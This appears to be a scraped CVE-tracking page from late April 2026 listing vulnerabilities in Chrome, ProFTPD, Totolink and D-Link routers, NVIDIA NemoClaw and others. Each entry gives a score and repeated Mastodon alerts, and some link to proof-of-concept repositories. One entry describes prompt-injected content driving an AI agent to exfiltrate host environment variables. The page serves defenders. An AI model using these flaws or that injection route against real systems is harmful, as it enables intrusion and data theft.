Use after free in Accessibility in Google Chrome on Windows prior to 147.0.7727.138 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical)

offseq at 2026-04-29T01:30:26.954Z ##

CRITICAL: Chrome <147.0.7727.138 on Windows is vulnerable to a use-after-free in Accessibility (CVE-2026-7344). Allows sandbox escape after renderer compromise. Patch now to mitigate risk. radar.offseq.com/threat/cve-20

##

offseq@infosec.exchange at 2026-04-29T01:30:26.000Z ##

CRITICAL: Chrome <147.0.7727.138 on Windows is vulnerable to a use-after-free in Accessibility (CVE-2026-7344). Allows sandbox escape after renderer compromise. Patch now to mitigate risk. radar.offseq.com/threat/cve-20 #OffSeq #Chrome #Vuln #Cybersecurity

##

CVE-2026-7343
(0 None)

EPSS: 0.00%

updated 2026-04-28T23:16:21.883000

2 posts

Use after free in Views in Google Chrome on Windows prior to 147.0.7727.138 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical)

offseq at 2026-04-29T00:00:40.403Z ##

⚠️ CRITICAL: CVE-2026-7343 in Chrome (Windows <147.0.7727.138) is a use-after-free in Views that could allow renderer sandbox escape. Patch ASAP to mitigate. No known exploits yet. radar.offseq.com/threat/cve-20

##

offseq@infosec.exchange at 2026-04-29T00:00:40.000Z ##

⚠️ CRITICAL: CVE-2026-7343 in Chrome (Windows <147.0.7727.138) is a use-after-free in Views that could allow renderer sandbox escape. Patch ASAP to mitigate. No known exploits yet. radar.offseq.com/threat/cve-20 #OffSeq #Chrome #Vulnerability #Security

##

CVE-2026-42167
(8.1 HIGH)

EPSS: 0.00%

updated 2026-04-28T23:16:20.610000

2 posts

mod_sql in ProFTPD before 1.3.10rc1 allows remote attackers to execute arbitrary code via a username, in scenarios where there is logging of USER requests with an expansion such as %U, and the SQL backend allows commands (e.g., COPY TO PROGRAM).

1 repos

https://github.com/ZeroPathAI/proftpd-CVE-2026-42167-poc

thehackerwire@mastodon.social at 2026-04-28T23:27:41.000Z ##

🟠 CVE-2026-42167 - High (8.1)

mod_sql in ProFTPD before 1.3.10rc1 allows remote attackers to execute arbitrary code via a username, in scenarios where there is logging of USER requests with an expansion such as %U, and the SQL backend allows commands (e.g., COPY TO PROGRAM).

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-28T23:27:41.000Z ##

🟠 CVE-2026-42167 - High (8.1)

mod_sql in ProFTPD before 1.3.10rc1 allows remote attackers to execute arbitrary code via a username, in scenarios where there is logging of USER requests with an expansion such as %U, and the SQL backend allows commands (e.g., COPY TO PROGRAM).

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41873
(9.8 CRITICAL)

EPSS: 0.00%

updated 2026-04-28T22:16:49.900000

2 posts

** UNSUPPORTED WHEN ASSIGNED ** Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') vulnerability in Pony Mail leading to admin account takeover. This issue affects all versions of the Lua implementation of Pony Mail. There is a Python implementation under development under the name "Pony Mail Foal" that is not affected by this issue, but hasn't been released yet. As

thehackerwire@mastodon.social at 2026-04-28T23:27:51.000Z ##

🔴 CVE-2026-41873 - Critical (9.8)

** UNSUPPORTED WHEN ASSIGNED ** Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') vulnerability in Pony Mail leading to admin account takeover.

This issue affects all versions of the Lua implementation of Pony Mail....

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-28T23:27:51.000Z ##

🔴 CVE-2026-41873 - Critical (9.8)

** UNSUPPORTED WHEN ASSIGNED ** Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') vulnerability in Pony Mail leading to admin account takeover.

This issue affects all versions of the Lua implementation of Pony Mail....

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41649
(7.7 HIGH)

EPSS: 0.00%

updated 2026-04-28T22:16:49.747000

2 posts

Outline is a service that allows for collaborative documentation. The `shares.create` API endpoint starting in version 0.86.0 and prior to version 1.7.0 has an insecure direct object reference.. When both `collectionId` and `documentId` are provided in the request, the authorization logic only checks access to the collection, completely ignoring the document. This allows an authenticated attacker

thehackerwire@mastodon.social at 2026-04-28T22:30:23.000Z ##

🟠 CVE-2026-41649 - High (7.7)

Outline is a service that allows for collaborative documentation. The `shares.create` API endpoint starting in version 0.86.0 and prior to version 1.7.0 has an insecure direct object reference.. When both `collectionId` and `documentId` are provid...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-28T22:30:23.000Z ##

🟠 CVE-2026-41649 - High (7.7)

Outline is a service that allows for collaborative documentation. The `shares.create` API endpoint starting in version 0.86.0 and prior to version 1.7.0 has an insecure direct object reference.. When both `collectionId` and `documentId` are provid...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-38651
(8.2 HIGH)

EPSS: 0.00%

updated 2026-04-28T21:37:12

2 posts

Authentication Bypass vulnerability exists in Netmaker versions prior to 1.5.0. The VerifyHostToken function in logic/jwts.go fails to validate the JWT signature when verifying host tokens. An attacker can forge a JWT signed with any arbitrary key and use it to impersonate any host in the network, gaining access to sensitive information

thehackerwire@mastodon.social at 2026-04-28T22:34:34.000Z ##

🟠 CVE-2026-38651 - High (8.2)

Authentication Bypass vulnerability exists in Netmaker versions prior to 1.5.0. The VerifyHostToken function in logic/jwts.go fails to validate the JWT signature when verifying host tokens. An attacker can forge a JWT signed with any arbitrary key...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-28T22:34:34.000Z ##

🟠 CVE-2026-38651 - High (8.2)

Authentication Bypass vulnerability exists in Netmaker versions prior to 1.5.0. The VerifyHostToken function in logic/jwts.go fails to validate the JWT signature when verifying host tokens. An attacker can forge a JWT signed with any arbitrary key...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-32202
(4.3 MEDIUM)

EPSS: 0.09%

updated 2026-04-28T21:37:03

8 posts

Protection mechanism failure in Windows Shell allows an unauthorized attacker to perform spoofing over a network.

secdb at 2026-04-28T20:00:14.476Z ##

🚨 [CISA-2026:0428] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2024-1708 (secdb.nttzen.cloud/cve/detail/)
- Name: ConnectWise ScreenConnect Path Traversal Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: ConnectWise
- Product: ScreenConnect
- Notes: connectwise.com/company/trust/ ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-32202 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

##

Chris@mast.social at 2026-04-28T18:17:44.000Z ##

🛡️ Title: Windows Shell Spoofing Vulnerability
Description

🛡️ Protection mechanism failure in Windows Shell allows an unauthorized attacker to perform spoofing over a network.

cve.org/CVERecord?id=CVE-2026-

#cybersecurity #security #windows #microsoft

##

cisakevtracker@mastodon.social at 2026-04-28T18:01:08.000Z ##

CVE ID: CVE-2026-32202
Vendor: Microsoft
Product: Windows
Date Added: 2026-04-28
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

secdb@infosec.exchange at 2026-04-28T20:00:14.000Z ##

🚨 [CISA-2026:0428] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2024-1708 (secdb.nttzen.cloud/cve/detail/)
- Name: ConnectWise ScreenConnect Path Traversal Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: ConnectWise
- Product: ScreenConnect
- Notes: connectwise.com/company/trust/ ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-32202 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260428 #cisa20260428 #cve_2024_1708 #cve_2026_32202 #cve20241708 #cve202632202

##

Chris@mast.social at 2026-04-28T18:17:44.000Z ##

🛡️ Title: Windows Shell Spoofing Vulnerability
Description

🛡️ Protection mechanism failure in Windows Shell allows an unauthorized attacker to perform spoofing over a network.

cve.org/CVERecord?id=CVE-2026-

#cybersecurity #security #windows #microsoft

##

cisakevtracker@mastodon.social at 2026-04-28T18:01:08.000Z ##

CVE ID: CVE-2026-32202
Vendor: Microsoft
Product: Windows
Date Added: 2026-04-28
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

hackerworkspace@infosec.exchange at 2026-04-28T07:31:12.000Z ##

Microsoft Confirms Active Exploitation of Windows Shell CVE-2026-32202

thehackernews.com/2026/04/micr

Read on HackerWorkspace: hackerworkspace.com/article/mi

#cybersecurity #threatintelligence #vulnerability

##

threatcodex@infosec.exchange at 2026-04-27T20:20:47.000Z ##

A Shortcut to Coercion: Incomplete Patch of APT28's Zero-Day Leads to CVE-2026-32202
#CVE_2026_32202 #APT28 #CVE_2026_21510
akamai.com/blog/security-resea

##

CVE-2026-24222
(8.6 HIGH)

EPSS: 0.00%

updated 2026-04-28T21:36:23

4 posts

NVIDIA NeMoClaw contains a vulnerability in the sandbox environment initialization component, where a remote attacker could cause improper access control by sending prompt-injected content that causes the agent to read and exfiltrate host environment variables not properly restricted during sandbox creation. A successful exploit of this vulnerability might lead to information disclosure.

thehackerwire@mastodon.social at 2026-04-28T22:33:42.000Z ##

🟠 CVE-2026-24222 - High (8.6)

NVIDIA NeMoClaw contains a vulnerability in the sandbox environment initialization component, where a remote attacker could cause improper access control by sending prompt-injected content that causes the agent to read and exfiltrate host environm...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AAKL at 2026-04-28T16:53:25.991Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 nvidia.custhelp.com/app/answer

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: nvidia.custhelp.com/app/answer

##

thehackerwire@mastodon.social at 2026-04-28T22:33:42.000Z ##

🟠 CVE-2026-24222 - High (8.6)

NVIDIA NeMoClaw contains a vulnerability in the sandbox environment initialization component, where a remote attacker could cause improper access control by sending prompt-injected content that causes the agent to read and exfiltrate host environm...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AAKL@infosec.exchange at 2026-04-28T16:53:25.000Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 nvidia.custhelp.com/app/answer

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: nvidia.custhelp.com/app/answer #Nvidia #infoec #vulnerability

##

CVE-2026-24231
(6.3 MEDIUM)

EPSS: 0.00%

updated 2026-04-28T21:36:22

2 posts

NVIDIA NemoClaw contains a vulnerability in the validateEndpointUrl() SSRF protection component, where an attacker could cause a server-side request forgery by supplying a crafted endpoint URL referencing the 0.0.0.0/8 address range through a blueprint configuration file or CLI flag. A successful exploit of this vulnerability may lead to information disclosure.

AAKL at 2026-04-28T16:53:25.991Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 nvidia.custhelp.com/app/answer

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: nvidia.custhelp.com/app/answer

##

AAKL@infosec.exchange at 2026-04-28T16:53:25.000Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 nvidia.custhelp.com/app/answer

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: nvidia.custhelp.com/app/answer #Nvidia #infoec #vulnerability

##

CVE-2024-1708
(8.5 HIGH)

EPSS: 53.66%

updated 2026-04-28T21:34:00

4 posts

ConnectWise ScreenConnect 23.9.7 and prior are affected by path-traversal vulnerability, which may allow an attacker the ability to execute remote code or directly impact confidential data or critical systems.

3 repos

https://github.com/Teexo/ScreenConnect-CVE-2024-1709-Exploit

https://github.com/cjybao/CVE-2024-1709-and-CVE-2024-1708

https://github.com/W01fh4cker/ScreenConnect-AuthBypass-RCE

secdb at 2026-04-28T20:00:14.476Z ##

🚨 [CISA-2026:0428] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2024-1708 (secdb.nttzen.cloud/cve/detail/)
- Name: ConnectWise ScreenConnect Path Traversal Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: ConnectWise
- Product: ScreenConnect
- Notes: connectwise.com/company/trust/ ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-32202 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

##

cisakevtracker@mastodon.social at 2026-04-28T18:00:52.000Z ##

CVE ID: CVE-2024-1708
Vendor: ConnectWise
Product: ScreenConnect
Date Added: 2026-04-28
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

secdb@infosec.exchange at 2026-04-28T20:00:14.000Z ##

🚨 [CISA-2026:0428] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2024-1708 (secdb.nttzen.cloud/cve/detail/)
- Name: ConnectWise ScreenConnect Path Traversal Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: ConnectWise
- Product: ScreenConnect
- Notes: connectwise.com/company/trust/ ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-32202 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260428 #cisa20260428 #cve_2024_1708 #cve_2026_32202 #cve20241708 #cve202632202

##

cisakevtracker@mastodon.social at 2026-04-28T18:00:52.000Z ##

CVE ID: CVE-2024-1708
Vendor: ConnectWise
Product: ScreenConnect
Date Added: 2026-04-28
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2026-7289
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-28T20:25:44.987000

2 posts

A vulnerability was found in D-Link DIR-825M 1.1.12. This issue affects the function sub_414BA8 of the file /boafrm/formWanConfigSetup. The manipulation of the argument submit-url results in buffer overflow. The attack can be executed remotely. The exploit has been made public and could be used.

thehackerwire@mastodon.social at 2026-04-28T23:38:03.000Z ##

🟠 CVE-2026-7289 - High (8.8)

A vulnerability was found in D-Link DIR-825M 1.1.12. This issue affects the function sub_414BA8 of the file /boafrm/formWanConfigSetup. The manipulation of the argument submit-url results in buffer overflow. The attack can be executed remotely. Th...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-28T23:38:03.000Z ##

🟠 CVE-2026-7289 - High (8.8)

A vulnerability was found in D-Link DIR-825M 1.1.12. This issue affects the function sub_414BA8 of the file /boafrm/formWanConfigSetup. The manipulation of the argument submit-url results in buffer overflow. The attack can be executed remotely. Th...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7288
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-28T20:25:44.987000

2 posts

A vulnerability has been found in D-Link DIR-825M 1.1.12. This vulnerability affects the function sub_4151FC of the file /boafrm/formVpnConfigSetup. The manipulation of the argument submit-url leads to buffer overflow. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used.

thehackerwire@mastodon.social at 2026-04-28T23:28:00.000Z ##

🟠 CVE-2026-7288 - High (8.8)

A vulnerability has been found in D-Link DIR-825M 1.1.12. This vulnerability affects the function sub_4151FC of the file /boafrm/formVpnConfigSetup. The manipulation of the argument submit-url leads to buffer overflow. Remote exploitation of the a...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-28T23:28:00.000Z ##

🟠 CVE-2026-7288 - High (8.8)

A vulnerability has been found in D-Link DIR-825M 1.1.12. This vulnerability affects the function sub_4151FC of the file /boafrm/formVpnConfigSetup. The manipulation of the argument submit-url leads to buffer overflow. Remote exploitation of the a...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7204
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-28T20:24:58.820000

3 posts

A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. This issue affects the function setPptpServerCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. This manipulation of the argument enable causes os command injection. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized.

offseq@infosec.exchange at 2026-04-28T02:00:30.000Z ##

🚨 CRITICAL: Totolink A8000RU (7.1cu.643_b20200521) affected by CVE-2026-7204 — remote OS command injection in CGI handler. No patch yet. Restrict access & monitor for updates. Public exploit disclosed. radar.offseq.com/threat/cve-20 #OffSeq #Vulnerability #IoTSecurity #CVE20267204

##

thehackerwire@mastodon.social at 2026-04-28T01:44:02.000Z ##

🔴 CVE-2026-7204 - Critical (9.8)

A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. This issue affects the function setPptpServerCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. This manipulation of the argument enable causes os command inje...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-04-28T01:30:29.000Z ##

🚨 CRITICAL: Totolink A8000RU routers (7.1cu.643_b20200521) vulnerable to remote, unauthenticated OS command injection (CVE-2026-7204). No patch yet. Restrict access & monitor vendor channels. radar.offseq.com/threat/cve-20 #OffSeq #Vuln #RouterSecurity #CVE20267204

##

CVE-2026-7155
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-28T20:24:58.820000

2 posts

A security vulnerability has been detected in Totolink A8000RU 7.1cu.643_b20200521. This impacts the function setLoginPasswordCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument admpass leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used.

offseq@infosec.exchange at 2026-04-28T00:00:43.000Z ##

💥 CVE-2026-7155: CRITICAL OS command injection in Totolink A8000RU (7.1cu.643_b20200521). Exploitable remotely, no auth needed. Disable remote mgmt & restrict access until patch. Details: radar.offseq.com/threat/cve-20 #OffSeq #Vulnerability #CVE2026_7155 #IoTSecurity

##

thehackerwire@mastodon.social at 2026-04-27T21:28:13.000Z ##

🔴 CVE-2026-7155 - Critical (9.8)

A security vulnerability has been detected in Totolink A8000RU 7.1cu.643_b20200521. This impacts the function setLoginPasswordCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument admpass leads to os c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7154
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-28T20:24:58.820000

1 posts

A weakness has been identified in Totolink A8000RU 7.1cu.643_b20200521. This affects the function setAdvancedInfoShow of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Executing a manipulation of the argument tty_server can lead to os command injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks.

thehackerwire@mastodon.social at 2026-04-27T21:18:02.000Z ##

🔴 CVE-2026-7154 - Critical (9.8)

A weakness has been identified in Totolink A8000RU 7.1cu.643_b20200521. This affects the function setAdvancedInfoShow of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Executing a manipulation of the argument tty_server can lead to os...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7244
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-28T20:24:20.377000

1 posts

A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. The impacted element is the function setWiFiEasyGuestCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument merge results in os command injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks.

offseq@infosec.exchange at 2026-04-28T11:00:37.000Z ##

Totolink A8000RU (v7.1cu.643_b20200521) faces CRITICAL OS command injection (CVE-2026-7244, CVSS 9.3). Remote, unauthenticated exploit possible. No patch yet — restrict mgmt access & monitor for updates. radar.offseq.com/threat/cve-20 #OffSeq #Vuln #RouterSecurity #CVE2026_7244

##

CVE-2026-7240
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-28T20:24:20.377000

1 posts

A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. This vulnerability affects the function setVpnAccountCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument User leads to os command injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used.

offseq@infosec.exchange at 2026-04-28T08:00:31.000Z ##

🚨 CRITICAL OS command injection in Totolink A8000RU (7.1cu.643_b20200521) via setVpnAccountCfg lets remote attackers run arbitrary commands. No patch yet; restrict device access & monitor closely. CVE-2026-7240 radar.offseq.com/threat/cve-20 #OffSeq #CVE20267240 #infosec

##

CVE-2026-3323
(7.5 HIGH)

EPSS: 0.03%

updated 2026-04-28T20:23:20.703000

2 posts

An unsecured configuration interface on affected devices allows unauthenticated remote attackers to access sensitive information, including hashed credentials and access codes.

thehackerwire@mastodon.social at 2026-04-29T00:59:57.000Z ##

🟠 CVE-2026-3323 - High (7.5)

An unsecured configuration interface on affected devices allows unauthenticated remote attackers to access sensitive information, including hashed credentials and access codes.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T00:59:57.000Z ##

🟠 CVE-2026-3323 - High (7.5)

An unsecured configuration interface on affected devices allows unauthenticated remote attackers to access sensitive information, including hashed credentials and access codes.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5944
(8.2 HIGH)

EPSS: 0.00%

updated 2026-04-28T20:23:20.703000

2 posts

An improper access control vulnerability exists in the Cisco Intersight Device Connector for Nutanix Prism Central. The service exposes an API passthrough endpoint on TCP port 7373 that is accessible within the network scope of the deployment environment without authentication. An unauthenticated attacker with network access can exploit this vulnerability by sending crafted requests to the expo

thehackerwire@mastodon.social at 2026-04-29T00:16:05.000Z ##

🟠 CVE-2026-5944 - High (8.2)

An improper access control vulnerability exists in the Cisco Intersight Device Connector for Nutanix Prism Central. The service exposes an API passthrough endpoint on TCP port 7373 that is accessible within the network scope of the deployment envi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T00:16:05.000Z ##

🟠 CVE-2026-5944 - High (8.2)

An improper access control vulnerability exists in the Cisco Intersight Device Connector for Nutanix Prism Central. The service exposes an API passthrough endpoint on TCP port 7373 that is accessible within the network scope of the deployment envi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7279
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-28T20:22:38.260000

2 posts

AVACAST developed by eMPIA Technology, has a DLL Hijacking vulnerability, allowing authenticated local attackers to place a malicious DLL in a specific directory, resulting in arbitrary code execution with system privileges when the system loads the DLL.

thehackerwire@mastodon.social at 2026-04-29T01:00:07.000Z ##

🟠 CVE-2026-7279 - High (7.8)

AVACAST developed by eMPIA Technology, has a DLL Hijacking vulnerability, allowing authenticated local attackers to place a malicious DLL in a specific directory, resulting in arbitrary code execution with system privileges when the system loads t...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T01:00:07.000Z ##

🟠 CVE-2026-7279 - High (7.8)

AVACAST developed by eMPIA Technology, has a DLL Hijacking vulnerability, allowing authenticated local attackers to place a malicious DLL in a specific directory, resulting in arbitrary code execution with system privileges when the system loads t...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-67223
(7.5 HIGH)

EPSS: 0.00%

updated 2026-04-28T20:18:13.020000

2 posts

The Aranda File Server (AFS) component in Aranda Software Aranda Service Desk before 8.3.12 stores daily activity logs with predictable names in a publicly accessible directory, which allows unauthenticated remote attackers to obtain direct virtual paths of uploaded files and bypass access controls to download sensitive documents containing PII.

1 repos

https://github.com/brandonperezlara/CVE-2025-67223

thehackerwire@mastodon.social at 2026-04-29T00:15:55.000Z ##

🟠 CVE-2025-67223 - High (7.5)

The Aranda File Server (AFS) component in Aranda Software Aranda Service Desk before 8.3.12 stores daily activity logs with predictable names in a publicly accessible directory, which allows unauthenticated remote attackers to obtain direct virtua...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T00:15:55.000Z ##

🟠 CVE-2025-67223 - High (7.5)

The Aranda File Server (AFS) component in Aranda Software Aranda Service Desk before 8.3.12 stores daily activity logs with predictable names in a publicly accessible directory, which allows unauthenticated remote attackers to obtain direct virtua...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-27760
(8.1 HIGH)

EPSS: 0.00%

updated 2026-04-28T20:18:13.020000

2 posts

